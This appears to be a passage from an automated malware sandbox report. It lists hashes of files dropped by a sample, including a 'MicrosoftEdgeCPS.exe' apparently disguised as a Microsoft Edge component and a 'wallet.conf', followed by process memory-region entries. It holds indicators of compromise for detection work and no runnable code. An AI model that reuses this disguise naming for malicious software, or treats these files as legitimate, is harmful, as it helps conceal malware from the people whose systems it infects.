SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\id.confMD5
1acef9212f230eecca139872ddd7a6a0
SHA1a35658791f7f23db04e5bc428e6f031ae430db39
SHA256cf3e8b6e2c31c8b25749146097afedf8e6560227cc6cf812bc2116468ec14a07
SHA512e230a1693ef5688d6ca7daf37ac0f89191272e92fcf45bfa2039579943ce97d7702f62d46a55efda37f07a8b85922c4a4c65befe635c1f097dd3ce333151aa42
-
C:\Users\Admin\AppData\Roaming\EdgeCP\wallet.confMD5
69bf7238c8e32793411515d8ca5926a9
SHA1d6918bcceab927a036b760a82cadd340d83b8ed1
SHA25657df56c1be46da0057f1afe0147ac7a700fa4df393bf0b31cabd158939d1cb66
SHA5124a3f787a09c553dd6012d0529644d9b0e7ac672be032eead2d7f9db9a64ce46f315ae01771f893d35160cc597e7df2fab2b600f6b3ff5e97ca8df403699299f3
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msMD5
86358822ded5f0341e08e1589102d804
SHA111ffcfedf0225278fa3e9b93fe7d8ba8e741c070
SHA2569cf86a2fcb88c3a2fd421c9ae94f71f28339aa2c95309befb0aec3856831cabe
SHA512e9b9535636d2c32fb1b34cf0cd82f60b9f5f81b39440a24d773db0a01c4bbf11e77550c9de8ac64c0a35ad8f5d43b493b99f87f9a8561c911a8d619a398b3df4
-
\Users\Admin\AppData\Local\Temp\localmgr.exeMD5
f4f7f1f8b8f893bdd621f425646919a5
SHA1cc1ccc560723692407ce86972865a956faa62229
SHA256fd8ef0b8b997038aa6a4a416298965545e24f6367e364e58ebd6343515b73c8a
SHA5127621478e0d0e3036682e76e7db3675d5053a4decff033d75c9608744245b91b970a937f3006f80c6262408f8072b06b74af606c88d4c9a951eda88320275fc03
-
\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
memory/284-72-0x0000000004A10000-0x0000000004A11000-memory.dmpFilesize
4KB
-
memory/284-130-0x0000000006310000-0x0000000006311000-memory.dmpFilesize
4KB
-
memory/284-78-0x00000000049D0000-0x00000000049D1000-memory.dmpFilesize
4KB
-
memory/284-79-0x00000000049D2000-0x00000000049D3000-memory.dmpFilesize
4KB
-
memory/284-86-0x0000000004960000-0x0000000004961000-memory.dmpFilesize
4KB
-
memory/284-82-0x0000000002440000-0x0000000002441000-memory.dmpFilesize
4KB
-
memory/284-114-0x00000000055D0000-0x00000000055D1000-memory.dmpFilesize
4KB
-
memory/284-107-0x0000000006240000-0x0000000006241000-memory.dmpFilesize
4KB
-
memory/284-129-0x0000000006300000-0x0000000006301000-memory.dmpFilesize
4KB
-
memory/284-92-0x0000000005610000-0x0000000005611000-memory.dmpFilesize
4KB
-
memory/284-100-0x0000000005750000-0x0000000005751000-memory.dmpFilesize
4KB
-
memory/284-98-0x00000000056B0000-0x00000000056B1000-memory.dmpFilesize
4KB
-
memory/284-70-0x0000000002200000-0x0000000002201000-memory.dmpFilesize
4KB
-
memory/284-94-0x000000007EF30000-0x000000007EF31000-memory.dmpFilesize
4KB
-
memory/284-66-0x0000000000000000-mapping.dmp
-
memory/300-88-0x0000000000000000-mapping.dmp
-
memory/536-187-0x0000000000000000-mapping.dmp
-
memory/768-181-0x0000000000000000-mapping.dmp
-
memory/824-172-0x0000000000400000-0x0000000000413000-memory.dmpFilesize
76KB
-
memory/824-157-0x0000000000400000-0x0000000000413000-memory.dmpFilesize
76KB
-
memory/824-158-0x0000000000401000-mapping.dmp
-
memory/864-89-0x0000000000000000-mapping.dmp
-
memory/956-99-0x0000000000000000-mapping.dmp
-
memory/1052-173-0x0000000000400000-0x0000000000405000-memory.dmpFilesize
20KB
-
memory/1052-161-0x00000000004010B8-mapping.dmp
-
memory/1052-160-0x0000000000400000-0x0000000000405000-memory.dmpFilesize
20KB
-
memory/1072-59-0x00000000752F1000-0x00000000752F3000-memory.dmpFilesize
8KB
-
memory/1072-85-0x0000000000000000-mapping.dmp
-
memory/1112-77-0x0000000000000000-mapping.dmp
-
memory/1212-184-0x0000000000000000-mapping.dmp
-
memory/1220-176-0x0000000000401000-mapping.dmp
-
memory/1220-175-0x0000000000400000-0x0000000000431000-memory.dmpFilesize
196KB
-
memory/1220-180-0x0000000000400000-0x0000000000431000-memory.dmpFilesize
196KB
-
memory/1424-76-0x0000000000000000-mapping.dmp
-
memory/1544-141-0x0000000000401074-mapping.dmp
-
memory/1544-140-0x0000000000400000-0x0000000000405000-memory.dmpFilesize
20KB
-
memory/1544-145-0x0000000000400000-0x0000000000405000-memory.dmpFilesize
20KB
-
memory/1556-186-0x0000000000000000-mapping.dmp
-
memory/1564-185-0x0000000000000000-mapping.dmp
-
memory/1636-139-0x0000000000400000-0x000000000047C000-memory.dmpFilesize
496KB
-
memory/1636-136-0x00000000004466F4-mapping.dmp
-
memory/1636-135-0x0000000000400000-0x000000000047C000-memory.dmpFilesize
496KB
-
memory/1640-80-0x0000000001EE0000-0x0000000002B2A000-memory.dmpFilesize
12.3MB
-
memory/1640-65-0x0000000000000000-mapping.dmp
-
memory/1640-134-0x0000000005620000-0x0000000005621000-memory.dmpFilesize
4KB
-
memory/1640-146-0x0000000006130000-0x0000000006131000-memory.dmpFilesize
4KB
-
memory/1664-174-0x0000000000400000-0x0000000000406000-memory.dmpFilesize
24KB
-
memory/1664-167-0x0000000000400000-0x0000000000406000-memory.dmpFilesize
24KB
-
memory/1664-168-0x0000000000401108-mapping.dmp
-
memory/1668-62-0x0000000000000000-mapping.dmp
-
memory/1684-147-0x0000000000400000-0x0000000000422000-memory.dmpFilesize
136KB
-
memory/1684-151-0x0000000000400000-0x0000000000422000-memory.dmpFilesize
136KB
-
memory/1684-148-0x0000000000413E10-mapping.dmp
-
memory/1684-84-0x0000000000000000-mapping.dmp
-
memory/1688-179-0x0000000000000000-mapping.dmp
-
memory/1704-193-0x0000000004E75000-0x0000000004E86000-memory.dmpFilesize
68KB
-
memory/1704-192-0x0000000004E70000-0x0000000004E71000-memory.dmpFilesize
4KB
-
memory/1704-189-0x0000000000000000-mapping.dmp
-
memory/1980-182-0x0000000000000000-mapping.dmp
-
memory/2016-156-0x0000000000400000-0x0000000000455000-memory.dmpFilesize
340KB
-
memory/2016-153-0x000000000044412E-mapping.dmp
-
memory/2016-152-0x0000000000400000-0x0000000000455000-memory.dmpFilesize
340KB
-
memory/2028-183-0x0000000000000000-mapping.dmp